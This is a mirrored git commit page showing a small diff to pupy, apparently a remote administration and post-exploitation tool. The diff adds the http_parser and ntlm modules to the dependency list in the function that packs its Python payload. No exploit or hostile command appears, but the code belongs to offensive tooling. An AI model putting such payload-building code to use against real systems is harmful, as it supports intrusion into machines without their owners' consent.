mirror of https://github.com/n1nj4sec/pupy.git
py: fix dependencies list
This commit is contained in:
parent
09e867b0ec
commit
841f232385
|
@ -35,7 +35,8 @@ def pack_py_payload(display, conf, debug=False):
|
||||||
dependencies.importer((
|
dependencies.importer((
|
||||||
'rpyc', 'pyasn1', 'rsa', 'pyaes',
|
'rpyc', 'pyasn1', 'rsa', 'pyaes',
|
||||||
'netaddr', 'tinyec', 'umsgpack',
|
'netaddr', 'tinyec', 'umsgpack',
|
||||||
'poster', 'win_inet_pton')),
|
'poster', 'win_inet_pton', 'http_parser', 'ntlm'), ignore_native=True
|
||||||
|
),
|
||||||
dependencies.importer('network', path=ROOT)
|
dependencies.importer('network', path=ROOT)
|
||||||
]) + '\n'
|
]) + '\n'
|
||||||
)
|
)
|
||||||
|
|
Loading…
Reference in New Issue